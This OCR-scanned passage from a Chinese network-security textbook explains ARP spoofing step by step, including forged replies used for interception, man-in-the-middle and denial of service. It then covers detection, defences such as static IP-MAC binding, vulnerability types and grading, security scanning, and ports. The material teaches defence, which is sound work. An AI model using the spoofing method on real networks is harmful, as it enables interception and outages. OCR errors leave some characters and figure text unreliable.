的 改变 ,因此 这 个 指针 不 会 被 使 用 。 与 数组 边界 检查 相 比 ,这 种 方法 不 能 解决 所 有 的 缓冲 区 
溢出 问题 。 但 这 种 方法 在 性 能 上 有 很 大 的 优势 ,而且 兼 容 性 也 很 好 。 


3.2.4 欺骗 攻击 及 其 防范 


网 络 欺骗 从 安全 学 角度 上 说 就 是 使 人 侵 者 相信 信息 系统 存在 有 价值 的 .可 利用 的 安全 
弱点 ,并 具有 一 些 可 攻击 窃取 的 资源 (当然 这 些 资源 是 伪造 的 或 不 重要 的 ) ,并 将 入 侵 者 引 向 
这 些 错误 的 资源 。 它 能 够 显著 地 增加 入 侵 者 的 工作 量 、 入 侵 复杂 度 以 及 不 确定 性 ,从 而 使 入 
侵 者 不 知道 其 进攻 是 否 奏效 或 成 功 。 而 且 , 它 允许 防护 者 跟踪 入 侵 者 的 行为 ,在 入 侵 者 之 前 
修补 系统 可 能 存在 的 安全 漏洞 。 相 对 地 ,欺骗 攻击 就 是 利用 假冒 ,伪装 后 的 身份 与 其 他 主机 
进行 合法 的 通信 或 发 送 假 的 报 文 ,使 受 攻击 的 主机 出 现 错误 ,或 者 是 伪造 一 系列 假 的 网 络 地 
址 和 网 络 空 间 项 替 真 正 的 网 络 主 机 为 用 户 提供 网 络 服务 ,以 此 方法 获得 访问 用 户 的 合法 信 
息 后 加 以 利用 ,并 转 而 攻击 主机 。 

常见 的 网 络 欺骗 攻击 主要 方式 有 ARP 欺骗 .DNS 欺骗 、Web 欺骗 .电子 邮件 欺骗 等 。 

1.ARP 欺骗 

互联 网 使 用 第 三 层 逻辑 地 址 (IP 地 址 ) 路 由 ,实现 网 间 通 信 , 然 后 在 局 域 网 内 使 用 第 二 
层 物理 地 址 ( 即 MAC 地 址 ) 寻 址 ,实现 局 域 网 内 通信 。 因 此 存在 IP 地 址 和 MAC 地 址 相互 
转换 的 问题 。 

ARP(Address Resolution Protocol, 地 址 解析 协议 ) 就 是 实现 IP 地 址 转化 成 物理 地 址 
的 协议 。ARP 协议 实现 依赖 于 局 域 网 内 每 台 主 机 的 ARP 缓存 表 , 每 台 主 机 中 都 有 一 张 
ARP 表 , 它 记录 着 主机 的 IP 地 址 和 MAC 地 址 的 对 应 关系 ,如 表 3-1 所 示 。 











表 3-1 ARP 缓存 表 
IP 地 址 MAC 地 址 
192. 168.1.1 01-01-01-01-01-01 
192. 168.1.2 02-02-02-02-02-02 
192. 168.1.3 03-03-03-03-03-03 








如 图 3-8 所 示 ,以 主机 D(192. 168. 1.4) 向 目标 主机 C(192. 168.1. 3) .目标 主机 B(192. 
168. 1.2) 发 送 数据 为 例 介绍 ARP 工作 原理 。 

(1) DD 发 送 数据 给 主机 C、.B。D 首先 检查 自己 的 ARP 缓存 表 , 查 看 是 否 有 目标 主机 的 
IP 地 址 和 MAC 地 址 的 对 应 关系 。 如 果 有 (主机 C: 192. 168. 1. 3) , 则 会 将 C 的 MAC 地 址 
(03-03-03-03-03-03) 作 为 目的 MAC 地 址 封装 到 数据 帧 中 发 送 ; 如 果 没 有 (主机 B: 192. 
168. 1. 2) ,D 会 发 送 一 个 ARP 查询 帧 (192. 168. 1. 2,FF-FF-FF-FF-FF-FF) ,这 表示 向 同一 
网 段 的 所 有 主机 发 出 这 样 的 询问 :“192. 168. 1. 2 的 MAC 地 址 是 什么 ?” 
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增加 一 行 : 网 关 A : 192.168.1.1 网 关 A _ ARP 缓存 表 
192.168.1.2，02-02-02-02-02-02 MAC:01-01-01-01-01-01 192.168.1.3，03-03-03-03-03-03 
192.168.1.4，04-04-04-04-04-04 
| 192. 168.1.2 
主机 D ARP 缓 存 表 = 
192.168.1.1, 01-01-01-01-01-01 增加 一 行 : 








192.168.1.3，03-03-03-03-03-03 
192. 168. 1.2 


192.168.1.2, 02-02-02-02-02-02 


















(dd-dd-dd-dd 
Hc'1'891°C614F 


人 





主机 D:192.168.1.4 主机 C:192.168.1.3 主机 B:192.168.1.2 
MAC:04-04-04-04-04-04 MAC:03-03-03-03-03-03 MAC:02-02-02-02-02-02 


图 3-8 ARP 工作 原理 


查询 帧 请 求 的 目标 IP 地 址 是 B 的 IP 地 址 (192. 168. 1. 2) ,目标 MAC 地 址 是 MAC 地 
址 的 广播 帧 ( 即 FF-FF-FF-FF-FF-FF), 源 IP 地 址 和 MAC 地 址 是 D 的 IP 地 址 和 MAC 
地 址 。 

(2) 当 交换 机 接收 到 此 数据 帧 之 后 ,发现 此 数据 帧 是 广播 帧 ,因此 ,会 将 此 数据 帧 从 非 
接收 的 所 有 接口 发 送出 去 。 

(3) 当 C、B 接收 到 此 数据 帧 后 ,会 校对 IP 地 址 是 否 是 自己 的 ,是 则 将 D 的 IP 地 址 和 
MAC 地 址 的 对 应 关系 增加 到 自己 的 ARP 缓存 表 中 ,同时 会 发 送 一 个 ARP 应 答 帧 ,其 中 包 
括 自己 的 MAC 地 址 和 IP 地 址 的 对 应 关系 : (192. 168. 1. 2,02-02-02-02-02-02); 否则 丢弃 
此 帧 ,拒绝 回复 此 帧 。 

(4) D 在 收 到 应 答 帧 后 ,在 自己 的 ARP 缓存 表 中 记录 主机 B 的 IP 地址 和 MAC 地 址 
的 对 应 关系 。 这 样 以 后 青 向 B 发 送 数据 时 ,直接 在 ARP 缓存 表 中 查找 就 可 以 了 。 此 时 交 
换 机 也 已 经 学 习 到 了 主机 D 和 主机 也 的 MAC 地 址 了 。 

ARP 实现 时 存在 如 下 缺陷 : ARP 协议 并 不 只 在 发 送 了 ARP 请 求 后 才 接 收 ARP 应 答 
当主 机 收 到 一 个 ARP 应 答 包 时 , 它 不 验证 自己 是 否 发 送 过 对 应 ARP 请 求 包 ,就 会 对 本 地 
的 ARP 缓存 表 进 行 更 新 ,直接 用 应 答 包 里 的 MAC 地 址 与 IP 地 址 对 应 的 关系 更 新 主机 
ARP 缓存 表 , 构 成 新 的 MAC 地 址 与 IP 地 址 对 应 关系 。 

利用 这 一 缺陷 , ARP 欺骗 主机 就 可 通过 向 ARP 被 攻击 主机 (主要 是 网 关 ) 发 送 伪造 的 
ARP 应 答 包 ( 伪 造 IP 地 址 或 MAC 地 址 ) 从 而 截获 应 发 往 ARP 被 攻击 主机 数据 ,实现 ARP 
欺骗 。 

ARP 欺骗 在 局 域 网 内 广泛 传播 ,欺骗 者 利用 它 可 进行 DoS、MIM 攻击 .DNS 欺骗 等 多 
种 方式 的 网 络 攻击 ,造成 局 域 网 通信 中 断 、 敏 感 数据 泄露 .数据 被 窜改 、 网 页 劫持 等 网 络 安全 
危害 ,已 成 为 局 域 网 安全 的 首要 威胁 。 


第 3 章 网 络 攻防 技术 2 





ARP 欺骗 分 为 : 

1) 支持 数据 包 再 转发 ,起 到 获取 用 户 数 据 包 信息 以 及 分 发 恶意 内 容 的 作用 

假定 主机 B 是 一 个 攻击 者 ,他 把 网 关 C 的 MAC 换 成 B 自己 的 ,那么 B 就 可 以 截获 到 
主机 A 与 C 的 通信 ,也 就 完成 了 一 次 简单 的 ARP 欺骗 。 

进一步 攻击 者 可 将 这 些 流 量 另 行 转 发 到 真正 的 目的 地 址 (被 动 式 分 组 嗅 探 , passive 
sniffing) ,隐蔽 自己 的 嗅 探 行为 或 是 筑 改 后 再 转送 (中 间 人 攻击 ,man-in-the-middle attack) 。 

(1) 如 图 3-9 所 示 ,B 向 网 关 C 发 送 伪造 的 ARP 应 答 (192. 168. 1. 2,03-03-03-03-03- 
03)。 网 关 接 收 到 B 伪造 的 ARP 应 答 后 ,就 会 更 新 网 关 的 ARP 缓存 表 , 增 加 一 行 (192. 
168. 1.2,03-03-03-03-03-03) ,以 后 网 关 收 到 发 往 A(192. 168. 1. 2) 的 数据 将 会 发 给 B(03- 
03-03-03-03-03) ,而 不 是 真实 的 A(02-02-02-02-02-02) ,从 而 实现 ARP 欺骗 。 

更 加 隐蔽 的 做 法 是 : B 再 主动 将 收 到 的 数据 包 转 发 给 真实 的 A(02-02-02-02-02-02) ,从 
而 隐藏 欺骗 行为 ,实现 中 间 人 攻击 。 





ARP 缓 存 表 
192. 168. 1. 2, 03-03-03-03-03-03 
192.168.1.3，03-03-03-03-03-03 















网 关 C : 192.168.1.1 
MAC:01-01-01-01-01-01 


主机 A:192.168.1.2 
MAC:02-02-02-02-02-02 


主机 B:192.168.1.3 小 
MAC:03-03-03-03-03-03 





发 送 伪造 的 应 答 包 ， 
192.168.1.1 的 MAC 地 址 是 
03-03-03-03-03-03 








ARP 缓 存 表 
192.168.1.1，01-01-01-01-01-01 
192.168.1.2，02-02-02-02-02-02 


ARP 缓 存 表 
192. 168. 1. 1，03-03-03-03-03-03 
192.168.1.3，03-03-03-03-03-03 




















图 3-9 ARP 欺骗 攻击 一 一 劫持 数据 


(2) 如 图 3-9 所 示 ,B 向 A 发送 伪造 的 ARP 应 答 (192. 168. 1. 1,03-03-03-03-03-03 ) 。 
A 接收 到 B 伪造 的 ARP 应 答 后 ,就 会 更 新 A 的 ARP 缓存 表 , 增 加 一 行 (192. 168. 1. 1,03- 
03-03-03-03-03) 。 由 于 局 域 网 通信 不 是 根据 IP 地 址 进行 ,而 是 按照 MAC 地 址 进行 传输 ， 
这 样 以 后 A 发 给 网 关 (192. 168. 1. 1) 的 数据 将 会 由 网 关 转 发 给 B(03-03-03-03-03-03) ,实现 
劫持 数据 ,获取 A 的 信息 。 

2) 劫持 数据 包 至 不 存在 的 MAC ,起 到 阻 断 用户 网 络 通信 的 作用 

攻击 者 发 送 一 系列 伪造 的 ARP 应 答 包 (包含 错误 的 内 网 MAC 地 址 和 正确 的 IP 地 址 
对 应 关系 ) 到 网 关 , 并 按照 一 定 的 频率 不 断 进行 ,使 真实 ARP 应 答 包 无 法 通过 定时 更 新 保 
存在 网 关中 ,结果 网 关 收 到 的 所 有 数据 只 能 发 送 给 错误 的 MAC 地址 ,造成 正常 PC 无 法 收 
到 信息 。 如 果 伪 造 的 MAC 是 一 个 不 存在 的 MAC 地 址 ,就 会 造成 网 络 不 通 ,达到 阻 断 服务 
攻击 的 效果 。 
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3) 伪造 网 关 

它 的 原理 是 建立 假 网 关 , 让 被 它 欺骗 的 主机 向 假 网 关 发 送 数据 ,而 不 是 通过 正常 的 路 由 
器 途径 上 网 。 由 于 假 网 关 通 常 都 不 是 网 关 物 理 设备 ,而 仅仅 是 一 台 普 通 主 机 ,数据 转发 速度 
不 能 满足 线 速 转发 要 求 ,所 以 其 他 主机 就 会 出 现 网 速 极 慢 或 者 根本 上 不 了 网 、 时 常 掉 线 的 状 
况 , 严 重 时 更 会 出 现 大 面积 掉 线 的 恶劣 后 果 。 

综 上 所 述 ,ARP 协议 建立 在 信任 局 域 网 内 所 有 节点 的 基础 上 ,是 一 种 高 效 但 不 安全 的 
无 状态 协议 ,在 实现 时 存在 广播 性 ,无 连接 性 、 无 序 性 、 无 认证 和 动态 性 等 安全 漏洞 ,这 使 得 
ARP 欺骗 具有 合法 性 、 隐 项 性 和 欺骗 性 ,对 其 进行 人 侵 检测 和 防范 难度 很 大 ,难以 彻底 解 
决 。 加 之 ARP 欺骗 技术 门槛 低 ,所 以 对 ARP 欺骗 的 防范 是 一 个 长 期 的 日 常 性 工作 。 

2. 如 何 判 断 已 感染 了 ARP 病毒 

(1) 进行 网 络 流量 分 析 。ARP 缓存 表 采 用 老化 机 制 , 表 中 的 每 一 项 都 有 生存 周期 : 每 
一 项 2 min 未 使 用 则 删除 ,这样 可 以 减少 ARP 缓存 表 的 长 度 , 加 快 查询 速度 ; 每 一 项 最 多 
存活 10 min ,每 个 ARP 缓存 表 需 要 周期 性 更 新 ,网 络 中 ARP 网 络 流量 呈现 自 相 似 性 特征 ， 
如 图 3-10 所 示 。 根 据 图 3-10 中 的 流量 曲线 计算 Hurst 指数 值 为 0. 87, 说 明 流量 具有 自 相 
似 性 。 





零 均值 化 流量 
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ARP 流 量 ( 包 /分 ) 











“0 2 4 6 8 10 12 14 16 18 
时 间 ( 分 ) 
图 3-10 ARP 正常 网 络 流量 


由 于 ARP 缓存 表 采 用 老化 机 制定 时 进行 数据 更 新 ,为 了 保持 攻击 状态 , ARP 欺骗 主 
机 就 需要 周期 性 发 送 大 量 伪造 的 ARP 应 答 包 以 淹没 正常 的 ARP 应 答 包 ,使 得 主机 的 ARP 
缓存 表 内 保持 假 的 MAC 地址 与 IP 地 址 对 应 关系 ,从 而 达到 ARP 欺骗 的 目的 。 这 将 导致 
ARP 网 络 流量 表现 为 强烈 的 局 部 突 发 .网 络 流量 呈现 重 尾 分 布 的 特征 ,如 图 3-11 所 示 。 据 
此 可 较 准 确 判 断 网 络 中 是 否 存在 ARP 攻击 。 

(2) 直观 观察 是 否 存在 以 下 现象 : 网 络 不 稳定 一 一 网 络 突然 无 法 连接 ,过 一 段 时 间 后 
会 自动 正常 ; 网 络 无 法 连接 ,但 重新 启动 计算 机 或 通过 “开始 ”1“ 运 行 " 命 令 输入 cmd, 进 入 
DOS 窗口 ,再 输入 “arp - d” 命 令 后 又 恢复 正常 ,但 一 段 时 间 又 会 无 法 连接 。 
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零 均值 化 流量 


ARP 流 量 ( 包 /分 ) 











0 5 10 15 20 25 30 35 40 
时 间 ( 分 ) 
图 3-11 ARP 异常 网 络 流量 


(3) 检测 ARP 缓存 表 中 是 否 有 重复 的 MAC 地 址 。 方 法 是 在 DOS 命令 行 窗口 输入 
cmd, 再 输入 "arp - a” 命 令 看 是 否 有 重复 的 MAC 地 址 。 

3. ARP 欺骗 的 防范 

(1) 不 用 把 计算 机 的 网 络 安全 信任 关系 单独 建立 在 IP 基础 上 或 MAC 基础 上 ,理想 的 
关系 应 该 建立 在 IP 十 MAC 基础 上 。 

(2) 在 客户 端 使 用 ARP 命令 绑 定 网 关 的 真实 MAC 地 址 。 

(3) 在 交换 机 上 设置 端口 与 MAC 地 址 的 静态 绑 定 。 

(4) 在 路 由 器 设置 IP 地 址 与 MAC 地 址 的 静态 绑 定 。 

(5) 管理 员 定 期 用 响应 的 IP 包 中 获得 一 个 RARP 请 求 , 然 后 检查 ARP 响应 的 真实 情 
况 , 发 现 异常 立即 处 理 。 同 时 ,管理 员 要 定期 轮 询 ,经 常 检查 主机 上 的 ARP 缓存 。 

(6) 使 用 防火 墙 连续 监控 网 络 。 注 意 使 用 SNMP 时 ,ARP 的 欺骗 可 能 导致 陷阱 包 
丢失 。 


3.3 网 络 安全 扫描 


3.3.1 网 络 安全 漏洞 


网 络 安全 漏洞 是 指 任何 会 引起 网 络 系统 的 安全 性 受到 破坏 的 事物 ,是 在 硬件 、 软 件 、 协 
议 的 具体 实现 或 系统 安全 策略 上 存在 的 缺陷 ,包括 不 恰当 的 操作 、 配 置 不 当 和 弱 口令 等 ,从 
而 可 以 使 攻击 者 能 够 在 未 授权 的 情况 下 访问 或 破坏 系统 。 

任何 网 络 系统 都 存在 漏洞 ,没有 绝对 安全 。 

漏洞 经 常 被 黑客 利用 ,从 而 进行 网 络 攻击 。 漏 洞 具有 如 下 3 个 特性 : 

(1) 长 久 性 。 漏 洞 与 时 间 紧 密 相关 。 一 个 系统 从 发 布 的 第 一 天 起 , 随 着 用 户 的 深入 使 
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用 ,其 中 存在 的 漏洞 会 被 不 断 暴 露出 来 , 随 之 被 发 现 的 漏洞 也 会 不 断 被 系统 供应 商 发 布 的 补 
丁 修补 ,或 在 以 后 发 布 的 新 版 本 中 得 以 纠正 。 随 着 时 间 的 推移 , 旧 的 漏洞 会 不 断 消 失 ,新 的 
漏洞 会 不 断 出 现 。 漏 洞 问题 也 会 长 期 存在 。 例 如 微软 的 Windows 自发 布 以 来 ,微软 就 不 断 
地 给 系统 打 补丁 、 升 级 。 

(2) 多 样 性 。 漏 洞 会 影响 到 很 大 范围 的 软 硬 件 设备 ,包括 系统 本 身 及 其 支撑 软件 .网络 
客户 和 服务 器 软件 、 网 络 路 由 器 和 安全 防火 墙 等 。 在 不 同 种 类 的 软 硬 件 设备 之 间 、 同 种 设备 
的 不 同 版 本 之 间 、 由 不同 设备 构成 的 不 同系 统 之 间 以 及 同 种 系统 在 不 同 的 设置 条 件 下 ,都 会 
存在 各 自 不 同 的 漏洞 问题 。 

(3) 隐蔽 性 。 漏 洞 是 在 系统 具体 使 用 和 实现 过 程 中 产生 的 错误 ,只 有 能 威胁 到 系统 安 
全 的 错误 才 是 漏洞 。 许 多 错误 在 通常 情况 下 并 不 会 对 系统 安全 造成 危害 ,只 有 在 某 些 条 件 
下 被 人 利用 时 才 会 影响 系统 安全 。 

漏洞 不 是 自己 出 现 的 ,而 是 被 使 用 者 发 现 的 。 攻 击 者 往往 是 系统 漏洞 的 发 现 者 和 使 用 
者 。 从 某 种 意义 上 讲 , 是 攻击 者 使 网 络 系统 变 得 越 来 越 安全 。 

这 里 需要 注意 漏洞 与 不 同安 全 级 别 计算 机 系统 之 间 的 关系 。 从 理论 上 说 ,系统 的 安全 
级 别 越 高 ,该 系统 也 越 安 全 。 但 实际 上 漏洞 是 独立 于 操作 系统 本 身 的 理论 安全 级 别 而 存在 
的 。 并 不 是 说 ,系统 所 属 的 安全 级 别 越 高 ,该 系统 中 存在 的 漏洞 就 越 少 。 而 是 在 安全 性 较 高 
的 系统 中 ,入 侵 者 如 果 希 望 进 一 步 获 得 特权 或 对 系统 造成 较 大 的 破坏 时 ,必须 要 克服 更 大 的 
障碍 。 

1. 漏洞 产生 的 原因 

如 今 在 Internet 上 ,网 络 的 安全 性 问题 越 来 越 严重 。 一 方面 ,黑客 利用 安全 漏洞 引起 的 
安全 事件 数量 呈 s 上 升 趋势 “千里 堤坝 , 毁 于 蚊 穴 .黑客 一 旦 找到 网 络 中 的 薄弱 环节 ,就 能 
轻而易举 地 间 人 和 人 系统。 所以, 了解 系 统 中 哪里 存在 安全 隐患 ,并 及 时 修补 漏洞 至 关 重 要 。 通 
常 “ 蚁 穴 ” 主 要 表现 在 软件 或 协议 设计 存在 缺陷 、 软 件 或 协议 实现 的 漏洞 以 及 系统 或 网 络 配 
置 不 当 等 方面 。 另 一 方面 ,似乎 越 是 大 型 软件 ,其 后 推出 的 补丁 数量 也 呈 上 升 趋势 ,其 中 大 
部 分 的 补丁 是 针对 漏洞 的 。 

漏洞 产生 的 原因 ,归纳 起 来 有 以 下 几 个 方面 。 

(1) 早期 Internet 设计 的 缺陷 。Internet 设计 的 初 囊 是 为 了 相互 交流 ,实现 资源 共享 。 
设计 者 并 未 充分 考虑 网 络 安全 需求 。Internet 的 开放 性 使 得 其 在 短期 内 得 到 莲 孝 发 展 。 也 
正 因 如 此 ,攻击 者 能 快速 、 低 成 本 地 对 网 络 进行 攻击 ,而 把 自己 隐藏 起 来 ,不 被 觉察 和 跟踪 。 

协议 是 定义 网 络 上 计算 机 会 话 和 通信 的 规则 ,如 果 协 议 的 设计 存在 漏洞 ,那么 无 论 使 用 
该 协议 的 应 用 服务 设计 得 多 完美 , 它 仍 然 是 存在 漏洞 的 。 如 TCP/IP 协议 的 缺陷 ,TCP/IP 
协议 现在 已 经 广 为 应 用 , 它 早 期 设计 存在 的 不 足 造 成 的 安全 漏洞 在 所 难免 。 例 如 ,smnurf 攻 
击 、IP 地 址 欺骗 等 。 然 而 ,最 大 的 问题 在 于 IP 协议 是 非常 容易 轻信 的 ,就 是 说 入侵 者 可 以 
随意 地 伪造 及 修改 IP 数据 包 而 不 被 发 现 。IPSec 协议 可 以 用 来 克服 这 个 不 足 , 现 在 已 得 到 
广泛 应 用 。 

(2) 软件 自身 缺陷 。 即 使 是 协议 设计 得 足够 完美 ,但 在 实现 过 程 中 引入 漏洞 也 是 不 可 
避免 的 。 如 邮件 协议 的 一 个 实现 中 能 够 让 攻击 者 通过 与 受害 主机 的 邮件 端口 建立 连接 , 达 
到 欺骗 受害 主机 执行 非法 任务 的 目的 ,或 者 使 人 侵 者 具有 访问 受 保护 文件 和 执行 服务 器 程 
序 的 权限 。 这 样 的 漏洞 往往 会 导致 攻击 者 不 需要 访问 主机 的 凭证 就 能 够 从 远程 控制 服 
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务 器 。 

随 着 Internet 的 发 展 ,各 种 各 样 新 型 .复杂 的 网 络 服务 和 软件 层出不穷 ,这 些 服务 和 软 
件 在 设计 、 部 署 和 维护 上 都 可 能 存在 各 种 安全 问题 。 为 保证 在 市 场 竞争 中 占 得 先 机 ,任何 设 
计 者 都 不 能 保证 产品 中 没有 错误 ,这 就 造成 了 软件 本 身 存在 的 漏洞 。 同 时 ,商业 系统 为 迎合 
用 户 需求 的 易 用 性 、 维 护 性 等 要 求 ,大 多 数 情况 下 ,不 得 不 牺牲 安全 性 和 可 靠 性 。 

(3) 系统 或 网 络 配置 不 当 。 许 多 系统 安装 后 都 有 默认 的 安全 配置 信息 ,默认 配置 往往 
存在 不 足 。 所 以 管理 员 要 及 时 更 改 配置 ,避免 人 侵 者 利用 这 些 配置 对 服务 器 进行 攻击 。 如 
FTP 的 匿名 账号 就 曾 给 不 少 管理 员 带 来 麻烦 。 又 如 ,有 时 为 了 测试 使 用 ,管理 员 会 在 机 器 
上 打开 一 个 临时 端口 ,但 测试 完 后 却 忘记 了 关闭 它 ,这 样 就 会 给 入 侵 者 有 漏洞 可 钻 。 通 常 的 
解决 策略 是 : 除非 一 个 端口 是 必须 使 用 的 ,否则 应 该 关闭 此 端口 。 

(4) 网 络 开源 。 网 络 的 开源 使 得 攻击 者 技术 不 断 提高 ,攻击 的 教程 和 工具 在 网 上 可 以 
轻易 找到 。 这 样 就 造成 攻击 事件 增多 ,而 且 攻 击 早期 不 易 被 网 络 安全 人 员 发 觉 。 

2. 漏洞 的 分 类 等 级 

一 般 来 说 ,漏洞 威胁 的 类 型 基本 上 决定 了 它 的 严重 性 ,根据 漏洞 所 造成 的 影响 和 危害 程 
度 可 把 严重 性 分 成 高 .中 、 低 3 个 级 别 。 

(1) 低级 别 漏洞 ,允许 拒绝 服务 的 漏洞 。 这 种 攻击 几乎 总 是 基于 操作 系统 的 ,也 就 是 
说 ,这 些 漏洞 存在 于 操作 系统 网 络 本 身 。 存 在 这 种 漏洞 时 ,必须 通过 软件 开发 者 或 销售 商 的 
弥补 予以 纠正 。 

(2) 中 级 别 漏洞 ,允许 本 地 用 户 非法 访问 的 漏洞 。 中 级 漏洞 允许 本 地 用 户 获得 增加 的 
和 未 授权 的 访问 ,这 种 漏洞 一 般 可 在 多 种 平台 的 应 用 程序 中 发 现 ,大 多 数 中 级 别 漏洞 是 由 应 
用 程序 的 缺陷 引起 的 。 

(3) 高 级 别 漏洞 ,允许 远程 用 户 未 经 授权 访问 的 漏洞 。 高 级 别 漏洞 是 威胁 最 大 的 漏洞 。 
大 多 数 高 级 别 漏洞 是 由 于 较 差 的 系统 管理 或 设置 有 误 造成 的 。 例 如 ,远程 和 本 地 管理 员 权 
限 应 该 对 应 高 级 ,普通 用 户 权限 .权限 提升 . 读 取 受 限 文 件 . 远 程 和 本 地 拒绝 服务 对 应 中 级 ， 
远程 非 授权 文件 存 取 、 恢 复 欺骗、 服务 器 信息 泄露 对 应 低级 。 


3.3.2 网络 安全 扫描 定义 


网 络 安全 扫描 是 一 种 基于 Internet 远程 检测 目标 网 络 或 本 地 主机 安全 漏洞 的 技术 。 对 
于 系统 管理 员 来 说 ,通过 网 络 安全 扫描 ,能 够 发 现 所 维护 的 Web 服务 器 的 各 种 TCP/IP 端 
口 的 分 配 、 开 放 的 服务 .Web 服务 软件 版 本 和 这 些 服务 及 软件 呈现 在 Internet 上 的 安全 漏 
洞 ; 对 于 黑客 来 说 ,网 络 安全 扫描 技术 则 能 够 发 现 攻击 目标 的 脆弱 性 和 漏洞 ,便于 下 一 步 实 
施 攻击 。 

因此 ,对 于 网 络 系 统管 理 员 来 说 ,利用 网 络 安 全 扫描 ,可 以 用 积极 的 、 非 破坏 性 的 办 法 来 
检验 系统 是 否 有 可 能 被 攻击 而 崩溃 。 网 络 安全 扫描 技术 利用 了 一 系列 的 脚本 模拟 对 系统 进 
行 攻击 的 行为 ,并 对 结果 进行 分 析 。 这 种 技术 通常 被 用 来 进行 模拟 攻击 实验 和 安全 审计 。 
网 络 安全 扫描 技术 通常 与 防火 墙 \ 安 全 监控 系统 互相 配合 ,才能 为 网 络 提供 较 高 的 安全 性 。 

网 络 安全 扫描 是 黑客 攻击 的 第 二 步 。 其 原理 是 采取 模拟 攻击 的 形式 对 目标 可 能 存在 的 
已 知 安全 漏洞 逐 项 进行 检查 ,目标 可 以 是 工作 站 、 服 务 器 、 交 换 机 、 路 由 器 和 数据 库 应 用 等 对 
象 ,最 后 根据 扫描 结果 向 扫描 者 或 管理 员 提 供 周 密 可 靠 的 分 析 报 告 。 
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一 次 完整 的 网 络 安全 扫描 分 为 3 个 阶段 : 

(1) 发 现 目标 主机 或 网 络 。 

(2) 发 现 目标 后 进一步 搜集 目标 信息 ,包括 操作 系统 类 型 .运行 的 服务 以 及 服务 软件 的 
版 本 等 。 如 果 目 标 是 一 个 网 络 ,还 可 以 进一步 发 现 该 网 络 的 拓扑 结构 .路 由 设备 以 及 各 主机 
的 信息 。 

(3) 根据 搜集 到 的 信息 判断 或 者 进一步 测试 系统 是 否 存在 安全 漏洞 。 

扫描 通常 采用 两 种 策略 : 

(1) 被 动 式 策略 ,就 是 基于 主机 之 上 ,对 系统 中 不 合适 的 设置 .脆弱 的 口令 以 及 其 他 同 
安全 规则 抵触 的 对 象 进行 检查 。 

(2) 主动 式 策略 , 它 是 基于 网 络 的 ,通过 执行 一 些 脚 本 文件 模拟 对 系统 进行 攻击 的 行为 
并 记录 系统 的 反应 ,从 而 发 现 其 中 的 漏洞 。 

被 动 式 扫 描 不 会 对 系统 造成 破坏 ,而 主动 式 扫描 对 系统 进行 模拟 攻击 ,可 能 会 对 系统 造 
成 破坏 。 利 用 被 动 式 策略 扫描 称 为 系统 安全 扫描 ,利用 主动 式 策略 扫描 称 为 网 络 安全 扫描 。 

常见 的 安全 扫描 检测 技术 主要 包括 以 下 4 个 方面 。 

(1) 基于 应 用 的 检测 技术 , 它 采 用 被 动 的 、 非 破坏 性 的 办 法 检查 应 用 软件 包 的 设置 ,发 
现 安全 漏洞 。 

(2) 基于 主机 的 检测 技术 , 它 采 用 被 动 的 、 非 破坏 性 的 办 法 对 系统 进行 检测 。 通 过 在 主 
机 本 地 的 代理 程序 对 系统 配置 注册 表 、 系 统 日 志 、 文 件 系 统 或 数据 库 活动 进行 监视 扫描 , 然 
后 与 系统 的 漏洞 库 进 行 比较 ,如 果 满 足 匹配 条 件 , 则 认为 漏洞 存在 。 例 如 ,利用 低 版 本 的 
DNS Bind 漏洞 ,攻击 者 能 够 获得 root 权限 ,侵入 系统 ,或 在 远程 计算 机 中 执行 恶意 代码 。 

(3) 基于 目标 的 漏洞 检测 技术 , 它 采 用 被 动 的 , 非 破 坏 性 的 办 法 检查 系统 属性 和 文件 属 
性 ,如 数据 库 \、 注 册 号 等 。 

(4) 基于 网 络 的 检测 技术 , 它 采 用 积极 的 、 非 破坏 性 的 办 法 来 检验 系统 是 否 有 可 能 被 攻 
击 而 崩溃 。 它 利用 了 一 系列 的 脚本 模拟 对 系统 进行 攻击 的 行为 ,然后 对 结果 进行 分 析 。 它 
还 针对 已 知 的 网 络 漏洞 进行 检验 。 基 于 网 络 的 检测 技术 常 被 用 来 进行 穿 透 实验 和 安全 审 
记 。 这 种 技术 可 以 发 现 一 系列 平台 的 漏洞 ,也 容易 安装 。 但 是 , 它 可 能 会 影响 网 络 的 性 能 。 

网 络 漏洞 虽 多 ,但 并 不 全 是 无 法 阻止 的 。 防 火 墙 技术 是 被 动 防御 ,而 网 络 安全 扫描 是 主 
动 防御 。 若 采用 多 种 扫描 技术 相 结合 ,增强 漏洞 识别 的 准确 度 ,网 络 安全 性 就 会 得 到 很 大 的 
提升 。 

网 络 安全 扫描 技术 包括 有 PING 扫射 (Ping sweep) ,操作 系统 探测 (Operating system 
identification) ,访问 控制 规则 探测 (firewalking)、 端 口 扫描 (Port scan) 以 及 漏洞 扫描 
《vulnerability scan) 等 。 这 些 技术 在 网 络 安全 扫描 的 3 个 阶段 中 各 有 体现 。 


3.3.3 端口 扫描 技术 


1. 端口 的 概念 

Windows 中 的 端口 是 指 TCP/IP 协议 中 的 端口 ,范围 为 0 一 65 535。 

在 Internet 上 ,各 主机 间 通 过 TCP/IP 协议 发 送 和 接收 数据 包 , 各 个 数据 包 根 据 其 目的 
主机 的 IP 地 址 来 进行 互联 网 络 中 的 路 由 选择 ,通过 端口 将 数据 包 发 送 给 进程 。 本 地 操作 系 
统 会 给 有 需求 的 进程 分 配 协议 端口 ,每 个 协议 端口 由 一 个 正 整 数 标 识 , 如 80、139 和 445 等 。 
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当 目 的 主机 接收 到 数据 包 后 ,将 根据 报 文 首 部 的 目的 端口 号 ,把 数据 发 送 到 相应 端口 ,而 与 
此 端口 相对 应 的 那个 进程 将 会 接收 数据 并 等 待 下 一 组 数据 的 到 来 。 

端口 可 以 认为 是 一 个 队列 ,操作 系统 为 各 个 进程 分 配 了 不 同 的 队列 ,数据 包 按照 目的 端 
口 被 列 入 相应 的 队列 中 ,等 待 被 进程 调用 ,在 特殊 的 情况 下 ,这 个 队列 有 可 能 溢出 ,不 过 操作 
系统 允许 每 个 进程 指定 和 调整 自己 队列 的 大 小 。 不 是 只 有 接收 数据 包 的 进程 需要 开启 它 自 
己 的 端口 ,发 送 数据 包 的 进程 也 需要 开启 端口 ,这 样 ,数据 包 中 将 会 标识 出 源 端口 ,以 便 接收 
方 能 顺利 地 回 传 数据 包 到 这 个 端口 。 

端口 分 类 有 两 种 分 法 。 

1) 按 端口 号 可 分 为 三 大 类 

(1) 公认 端口 (熟知 端口 ): 0 一 1023 ,它们 专门 为 一 些 应 用 程序 提供 服务 。 通 常 这 些 端 
